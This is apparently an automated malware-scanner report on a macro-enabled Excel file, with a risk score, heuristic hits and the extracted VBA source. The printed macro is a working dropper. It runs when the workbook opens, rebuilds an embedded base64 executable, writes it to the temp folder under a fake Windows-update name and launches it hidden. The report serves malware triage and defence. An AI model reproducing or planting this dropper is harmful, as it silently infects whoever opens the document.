MALICIOUS
246
Risk Score
Heuristics 9
-
VBA project inside OOXML medium 7 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Dim shell As Object -
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Set shell = CreateObject("WScript.Shell") -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set shell = CreateObject("WScript.Shell") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Sub Workbook_Open() -
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Sub Auto_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
targetFile = Environ("TEMP") & "\win_update_BypassUIDSafe.exe" -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 19426 bytes |
SHA-256: b3c823b8d6801d72e85eff26438612eb7a545176bd6aa38018e363d4b45a19d6 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 6 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' ==========================================================
' Pure VBA Payload Dropper
' No external sheets required.
' ==========================================================
Sub Auto_Open()
ExecutePureVBA
End Sub
Sub Workbook_Open()
ExecutePureVBA
End Sub
Sub ExecutePureVBA()
On Error Resume Next
Dim fullData As String
Dim targetFile As String
Dim shell As Object
Debug.Print "[*] Reconstructing payload..."
fullData = ""
fullData = fullData & GetChunk0()
fullData = fullData & GetChunk1()
fullData = fullData & GetChunk2()
fullData = fullData & GetChunk3()
fullData = fullData & GetChunk4()
fullData = fullData & GetChunk5()
fullData = fullData & GetChunk6()
fullData = fullData & GetChunk7()
fullData = fullData & GetChunk8()
fullData = fullData & GetChunk9()
fullData = fullData & GetChunk10()
fullData = fullData & GetChunk11()
fullData = fullData & GetChunk12()
fullData = fullData & GetChunk13()
fullData = fullData & GetChunk14()
fullData = fullData & GetChunk15()
fullData = fullData & GetChunk16()
fullData = fullData & GetChunk17()
fullData = fullData & GetChunk18()
fullData = fullData & GetChunk19()
fullData = fullData & GetChunk20()
fullData = fullData & GetChunk21()
fullData = fullData & GetChunk22()
fullData = fullData & GetChunk23()
fullData = fullData & GetChunk24()
fullData = fullData & GetChunk25()
fullData = fullData & GetChunk26()
fullData = fullData & GetChunk27()
fullData = fullData & GetChunk28()
fullData = fullData & GetChunk29()
fullData = fullData & GetChunk30()
fullData = fullData & GetChunk31()
fullData = fullData & GetChunk32()
fullData = fullData & GetChunk33()
fullData = fullData & GetChunk34()
fullData = fullData & GetChunk35()
fullData = fullData & GetChunk36()
fullData = fullData & GetChunk37()
fullData = fullData & GetChunk38()
fullData = fullData & GetChunk39()
fullData = fullData & GetChunk40()
fullData = fullData & GetChunk41()
fullData = fullData & GetChunk42()
fullData = fullData & GetChunk43()
fullData = fullData & GetChunk44()
fullData = fullData & GetChunk45()
fullData = fullData & GetChunk46()
fullData = fullData & GetChunk47()
fullData = fullData & GetChunk48()
fullData = fullData & GetChunk49()
fullData = fullData & GetChunk50()
fullData = fullData & GetChunk51()
fullData = fullData & GetChunk52()
fullData = fullData & GetChunk53()
fullData = fullData & GetChunk54()
fullData = fullData & GetChunk55()
fullData = fullData & GetChunk56()
fullData = fullData & GetChunk57()
fullData = fullData & GetChunk58()
fullData = fullData & GetChunk59()
fullData = fullData & GetChunk60()
fullData = fullData & GetChunk61()
fullData = fullData & GetChunk62()
fullData = fullData & GetChunk63()
fullData = fullData & GetChunk64()
fullData = fullData & GetChunk65()
fullData = fullData & GetChunk66()
fullData = fullData & GetChunk67()
fullData = fullData & GetChunk68()
fullData = fullData & GetChunk69()
fullData = fullData & GetChunk70()
fullData = fullData & GetChunk71()
fullData = fullData & GetChunk72()
fullData = fullData & GetChunk73()
fullData = fullData & GetChunk74()
fullData = fullData & GetChunk75()
fullData = fullData & GetChunk76()
fullData = fullData & GetChunk77()
fullData = fullData & GetChunk78()
fullData = fullData & GetChunk79()
fullData = fullData & GetChunk80()
fullData = fullData & GetChunk81()
fullData = fullData & GetChunk82()
fullData = fullData & GetChunk83()
fullData = fullData & GetChunk84()
fullData = fullData & GetChunk85()
fullData = fullData & GetChunk86()
fullData = fullData & GetChunk87()
fullData = fullData & GetChunk88()
fullData = fullData & GetChunk89()
fullData = fullData & GetChunk90()
fullData = fullData & GetChunk91()
fullData = fullData & GetChunk92()
fullData = fullData & GetChunk93()
fullData = fullData & GetChunk94()
fullData = fullData & GetChunk95()
fullData = fullData & GetChunk96()
fullData = fullData & GetChunk97()
fullData = fullData & GetChunk98()
fullData = fullData & GetChunk99()
fullData = fullData & GetChunk100()
fullData = fullData & GetChunk101()
fullData = fullData & GetChunk102()
fullData = fullData & GetChunk103()
fullData = fullData & GetChunk104()
fullData = fullData & GetChunk105()
fullData = fullData & GetChunk106()
fullData = fullData & GetChunk107()
fullData = fullData & GetChunk108()
fullData = fullData & GetChunk109()
fullData = fullData & GetChunk110()
fullData = fullData & GetChunk111()
fullData = fullData & GetChunk112()
fullData = fullData & GetChunk113()
fullData = fullData & GetChunk114()
fullData = fullData & GetChunk115()
fullData = fullData & GetChunk116()
fullData = fullData & GetChunk117()
fullData = fullData & GetChunk118()
fullData = fullData & GetChunk119()
fullData = fullData & GetChunk120()
fullData = fullData & GetChunk121()
fullData = fullData & GetChunk122()
fullData = fullData & GetChunk123()
fullData = fullData & GetChunk124()
fullData = fullData & GetChunk125()
fullData = fullData & GetChunk126()
fullData = fullData & GetChunk127()
fullData = fullData & GetChunk128()
fullData = fullData & GetChunk129()
fullData = fullData & GetChunk130()
fullData = fullData & GetChunk131()
fullData = fullData & GetChunk132()
fullData = fullData & GetChunk133()
fullData = fullData & GetChunk134()
' Ðu?ng d?n luu file t?m
targetFile = Environ("TEMP") & "\win_update_BypassUIDSafe.exe"
' Gi?i mã và ghi file
ExtractBinary fullData, targetFile
' Th?c thi file
If Dir(targetFile) <> "" Then
Set shell = CreateObject("WScript.Shell")
shell.Run targetFile, 0, False
End If
End Sub
Sub ExtractBinary(data As String, path As String)
Dim xml As Object, node As Object, stream As Object
Set xml = CreateObject("Microsoft.XMLDOM")
Set node = xml.createElement("tmp")
node.DataType = "bin.base64"
node.Text = data
Set stream = CreateObject("ADODB.Stream")
stream.Type = 1 ' adTypeBinary
stream.Open
stream.Write node.NodeTypedValue
stream.SaveToFile path, 2
stream.Close
End Sub
Function GetChunk0() As String
Dim s As String
s = ""
s = s & "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAACScedH1hCJFNYQiRTWEIkU32gaFMYQiRSdmogV1BCJFJ2aihXSEIkUnZqNFdwQiRSdmowVzhCJFEabjRXPEIkUr5GIFdEQiRTWEIgU5hGJFNYQiRTJEIkURpuLFdcQiRRSaWNo1hCJFAAAAAAAAAAAAAAAAAAAAABQRQAAZIYDAKx1+WkAAAAAAAAAAPAAIgALAg4yABAXAAAQAAAAUCkAgF5AAABgKQAAAABAAQAAAAAQAAAAAgAABgAAAAAAAAAGAAAAAAAAAACAQAAABAAAAAAAAAIAYIEAABAAAAAAAAAQAAAAAAAAAAAQAAAAAAAAEAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAcEAASAYAAAAAAAAAAAAAAFA+AFA5AQAAAAAAAAAAAEh2QAAkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAuGpAACgAAADYa0AAQAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABVUFgwAAAAAABQKQAAEAAAAAAAAAAEAAAAAAAAAAAAAAAAAACAAADgVVBYMQAAAAAAEBcAAGApAAAOFwAABAAAAAAAAAAAAAAAAAAAQAAA4FVQWDIAAAAA"
s = s & "ABAAAABwQAAACAAAABIXAAAAAAAAAAAAAAAAAEAAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANS4xMABVUFghDSQOCst/sat8rLJ+pjlAAHf+FgAA0j8ASVkA0TwHACCVxCV/B17f2mCx3ptpHEHT5b4gLNXO1S5T+UeEhO6nsbCcz9F7zwS5SXpZrYOK6dHT58OWQI/68rB/FjAWRbWs2KCfABHRMQYmPx5cJLSeTnhz96B/J2JGn+qcrSs60MzAoBPxxAbjPnp+Y8npBruuBgm4Z6XTKi87NXn76rO2vwnZtV0DDUL3ZG2xEUEaseon3wsLZlE8pYa4+5qOJbJ4W3s+FLeBBu/HnmbC"
s = s & "K8nndPM4GQ6U0ON3T2TVpjhvkSdxcJGTtOYzXfql2/ed7NF8s14kOJYL3o5t7WHLpnV2eEFyd2dZoF1at1WAMSreW2dIsjcg79X1tNG5MEU2d7X6ffg43aTx5Eb41QTBThiveFDxdPzLOkFTnp2yG9zVF6yFQPI1J4GxWqIHKSmjHWCxMmjpqqMGXIh+WLVXH1JoH0UBzdFSz/EaC/XZyyu4oG2BWHC5+epu6ya8m7+q50DsnxTMUg1r9o11m8I13a6jHoZf53dlWLyETK2Nq8twJ0FWTf/eWsGuOJDL6Nar6K74UFB2sV42psqGx1zfXqbIPTmauaYx56TGyR/57I+WSdmx+8rM8KqVYFYreZJ95fsolMQZmGrwPf11T4OlC6d2PCOQsI3osYtQskEcAZxOlE+bxDh598F9dP6OiIkw25R2OLvVXKLJRN1MNDnsTlmQ03OC0/MWRXUx73M9npFp69w77I7U9b4GaUhYS9ss8s82rJzz87dMFy6sA/tZKQhPk/yp6u9EANT1P0toWN1KBwy+754kFCoaV6NHgAT/49c7PXul6yEfRCkLmfV/GUkhc4J+GOuxTmez5n1Q6gwjkHHLYA2kw+3udw9Thp//Xao+VjLLzdZk2EOVMn4b+mVBBDuWeaGGwt4qFIv0E54lJ060aIyr6VSsv0uMQBLA69D2t+ocMwZdYypYLHxTC9kQxln8OK5gcWEytKDtOIsUvItAV+IKCVNqZmxzuO5XpRWmUajMPhqcCxBZ0zPmU773NRHA3N25U26oChpz6vDucDCEZq7e"
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' ==========================================================
' Pure VBA Payload Dropper
' No external sheets required.
' ==========================================================
Sub Auto_Open()
ExecutePureVBA
End Sub
Sub Workbook_Open()
ExecutePureVBA
End Sub
Sub ExecutePureVBA()
On Error Resume Next
Dim fullData As String
Dim targetFile As String
Dim shell As Object
Debug.Print "[*] Reconstructing payload..."
fullData = ""
fullData = fullData & GetChunk0()
fullData = fullData & GetChunk1()
fullData = fullData & GetChunk2()
fullData = fullData & GetChunk3()
fullData = fullData & GetChunk4()
fullData = fullData & GetChunk5()
fullData = fullData & GetChunk6()
fullData = fullData & GetChunk7()
fullData = fullData & GetChunk8()
fullData = fullData & GetChunk9()
fullData = fullData & GetChunk10()
fullData = fullData & GetChunk11()
fullData = fullData & GetChunk12()
fullData = fullData & GetChunk13()
fullData = fullData & GetChunk14()
fullData = fullData & GetChunk15()
fullData = fullData & GetChunk16()
fullData = fullData & GetChunk17()
fullData = fullData & GetChunk18()
fullData = fullData & GetChunk19()
fullData = fullData & GetChunk20()
fullData = fullData & GetChunk21()
fullData = fullData & GetChunk22()
fullData = fullData & GetChunk23()
fullData = fullData & GetChunk24()
fullData = fullData & GetChunk25()
fullData = fullData & GetChunk26()
fullData = fullData & GetChunk27()
fullData = fullData & GetChunk28()
fullData = fullData & GetChunk29()
fullData = fullData & GetChunk30()
fullData = fullData & GetChunk31()
fullData = fullData & GetChunk32()
fullData = fullData & GetChunk33()
fullData = fullData & GetChunk34()
fullData = fullData & GetChunk35()
fullData = fullData & GetChunk36()
fullData = fullData & GetChunk37()
fullData = fullData & GetChunk38()
fullData = fullData & GetChunk39()
fullData = fullData & GetChunk40()
fullData = fullData & GetChunk41()
fullData = fullData & GetChunk42()
fullData = fullData & GetChunk43()
fullData = fullData & GetChunk44()
fullData = fullData & GetChunk45()
fullData = fullData & GetChunk46()
fullData = fullData & GetChunk47()
fullData = fullData & GetChunk48()
fullData = fullData & GetChunk49()
fullData = fullData & GetChunk50()
fullData = fullData & GetChunk51()
fullData = fullData & GetChunk52()
fullData = fullData & GetChunk53()
fullData = fullData & GetChunk54()
fullData = fullData & GetChunk55()
fullData = fullData & GetChunk56()
fullData = fullData & GetChunk57()
fullData = fullData & GetChunk58()
fullData = fullData & GetChunk59()
fullData = fullData & GetChunk60()
fullData = fullData & GetChunk61()
fullData = fullData & GetChunk62()
fullData = fullData & GetChunk63()
fullData = fullData & GetChunk64()
fullData = fullData & GetChunk65()
fullData = fullData & GetChunk66()
fullData = fullData & GetChunk67()
fullData = fullData & GetChunk68()
fullData = fullData & GetChunk69()
fullData = fullData & GetChunk70()
fullData = fullData & GetChunk71()
fullData = fullData & GetChunk72()
fullData = fullData & GetChunk73()
fullData = fullData & GetChunk74()
fullData = fullData & GetChunk75()
fullData = fullData & GetChunk76()
fullData = fullData & GetChunk77()
fullData = fullData & GetChunk78()
fullData = fullData & GetChunk79()
fullData = fullData & GetChunk80()
fullData = fullData & GetChunk81()
fullData = fullData & GetChunk82()
fullData = fullData & GetChunk83()
fullData = fullData & GetChunk84()
fullData = fullData & GetChunk85()
fullData = fullData & GetChunk86()
fullData = fullData & GetChunk87()
fullData = fullData & GetChunk88()
fullData = fullData & GetChunk89()
fullData = fullData & GetChunk90()
fullData = fullData & GetChunk91()
fullData = fullData & GetChunk92()
fullData = fullData & GetChunk93()
fullData = fullData & GetChunk94()
fullData = fullData & GetChunk95()
fullData = fullData & GetChunk96()
fullData = fullData & GetChunk97()
fullData = fullData & GetChunk98()
fullData = fullData & GetChunk99()
fullData = fullData & GetChunk100()
fullData = fullData & GetChunk101()
fullData = fullData & GetChunk102()
fullData = fullData & GetChunk103()
fullData = fullData & GetChunk104()
fullData = fullData & GetChunk105()
fullData = fullData & GetChunk106()
fullData = fullData & GetChunk107()
fullData = fullData & GetChunk108()
fullData = fullData & GetChunk109()
fullData = fullData & GetChunk110()
fullData = fullData & GetChunk111()
fullData = fullData & GetChunk112()
fullData = fullData & GetChunk113()
fullData = fullData & GetChunk114()
fullData = fullData & GetChunk115()
fullData = fullData & GetChunk116()
fullData = fullData & GetChunk117()
fullData = fullData & GetChunk118()
fullData = fullData & GetChunk119()
fullData = fullData & GetChunk120()
fullData = fullData & GetChunk121()
fullData = fullData & GetChunk122()
fullData = fullData & GetChunk123()
fullData = fullData & GetChunk124()
fullData = fullData & GetChunk125()
fullData = fullData & GetChunk126()
fullData = fullData & GetChunk127()
fullData = fullData & GetChunk128()
fullData = fullData & GetChunk129()
fullData = fullData & GetChunk130()
fullData = fullData & GetChunk131()
fullData = fullData & GetChunk132()
fullData = fullData & GetChunk133()
fullData = fullData & GetChunk134()
' Ðu?ng d?n luu file t?m
targetFile = Environ("TEMP") & "\win_update_BypassUIDSafe.exe"
' Gi?i mã và ghi file
ExtractBinary fullData, targetFile
' Th?c thi file
If Dir(targetFile) <> "" Then
Set shell = CreateObject("WScript.Shell")
shell.Run targetFile, 0, False
End If
End Sub
Sub ExtractBinary(data As String, path As String)
Dim xml As Object, node As Object, stream As Object
Set xml = CreateObject("Microsoft.XMLDOM")
Set node = xml.createElement("tmp")
node.DataType = "bin.base64"
node.Text = data
Set stream = CreateObject("ADODB.Stream")
stream.Type = 1 ' adTypeBinary
stream.Open
stream.Write node.NodeTypedValue
stream.SaveToFile path, 2
stream.Close
End Sub
Function GetChunk0() As String
Dim s As String
s = ""
s = s & "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAACScedH1hCJFNYQiRTWEIkU32gaFMYQiRSdmogV1BCJFJ2aihXSEIkUnZqNFdwQiRSdmowVzhCJFEabjRXPEIkUr5GIFdEQiRTWEIgU5hGJFNYQiRTJEIkURpuLFdcQiRRSaWNo1hCJFAAAAAAAAAAAAAAAAAAAAABQRQAAZIYDAKx1+WkAAAAAAAAAAPAAIgALAg4yABAXAAAQAAAAUCkAgF5AAABgKQAAAABAAQAAAAAQAAAAAgAABgAAAAAAAAAGAAAAAAAAAACAQAAABAAAAAAAAAIAYIEAABAAAAAAAAAQAAAAAAAAAAAQAAAAAAAAEAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAcEAASAYAAAAAAAAAAAAAAFA+AFA5AQAAAAAAAAAAAEh2QAAkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAuGpAACgAAADYa0AAQAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABVUFgwAAAAAABQKQAAEAAAAAAAAAAEAAAAAAAAAAAAAAAAAACAAADgVVBYMQAAAAAAEBcAAGApAAAOFwAABAAAAAAAAAAAAAAAAAAAQAAA4FVQWDIAAAAA"
s = s & "ABAAAABwQAAACAAAABIXAAAAAAAAAAAAAAAAAEAAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANS4xMABVUFghDSQOCst/sat8rLJ+pjlAAHf+FgAA0j8ASVkA0TwHACCVxCV/B17f2mCx3ptpHEHT5b4gLNXO1S5T+UeEhO6nsbCcz9F7zwS5SXpZrYOK6dHT58OWQI/68rB/FjAWRbWs2KCfABHRMQYmPx5cJLSeTnhz96B/J2JGn+qcrSs60MzAoBPxxAbjPnp+Y8npBruuBgm4Z6XTKi87NXn76rO2vwnZtV0DDUL3ZG2xEUEaseon3wsLZlE8pYa4+5qOJbJ4W3s+FLeBBu/HnmbC"
s = s & "K8nndPM4GQ6U0ON3T2TVpjhvkSdxcJGTtOYzXfql2/ed7NF8s14kOJYL3o5t7WHLpnV2eEFyd2dZoF1at1WAMSreW2dIsjcg79X1tNG5MEU2d7X6ffg43aTx5Eb41QTBThiveFDxdPzLOkFTnp2yG9zVF6yFQPI1J4GxWqIHKSmjHWCxMmjpqqMGXIh+WLVXH1JoH0UBzdFSz/EaC/XZyyu4oG2BWHC5+epu6ya8m7+q50DsnxTMUg1r9o11m8I13a6jHoZf53dlWLyETK2Nq8twJ0FWTf/eWsGuOJDL6Nar6K74UFB2sV42psqGx1zfXqbIPTmauaYx56TGyR/57I+WSdmx+8rM8KqVYFYreZJ95fsolMQZmGrwPf11T4OlC6d2PCOQsI3osYtQskEcAZxOlE+bxDh598F9dP6OiIkw25R2OLvVXKLJRN1MNDnsTlmQ03OC0/MWRXUx73M9npFp69w77I7U9b4GaUhYS9ss8s82rJzz87dMFy6sA/tZKQhPk/yp6u9EANT1P0toWN1KBwy+754kFCoaV6NHgAT/49c7PXul6yEfRCkLmfV/GUkhc4J+GOuxTmez5n1Q6gwjkHHLYA2kw+3udw9Thp//Xao+VjLLzdZk2EOVMn4b+mVBBDuWeaGGwt4qFIv0E54lJ060aIyr6VSsv0uMQBLA69D2t+ocMwZdYypYLHxTC9kQxln8OK5gcWEytKDtOIsUvItAV+IKCVNqZmxzuO5XpRWmUajMPhqcCxBZ0zPmU773NRHA3N25U26oChpz6vDucDCEZq7e"
Attribute VB_Name = "Chart1"
Attribute VB_Base = "0{00020821-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 41472 bytes |
SHA-256: 03cba9a13bac1969fc76bb2c8a40cf20b352ea24deb8a22e2d45f798ff28c899 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 7 long base64-like blob(s).
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.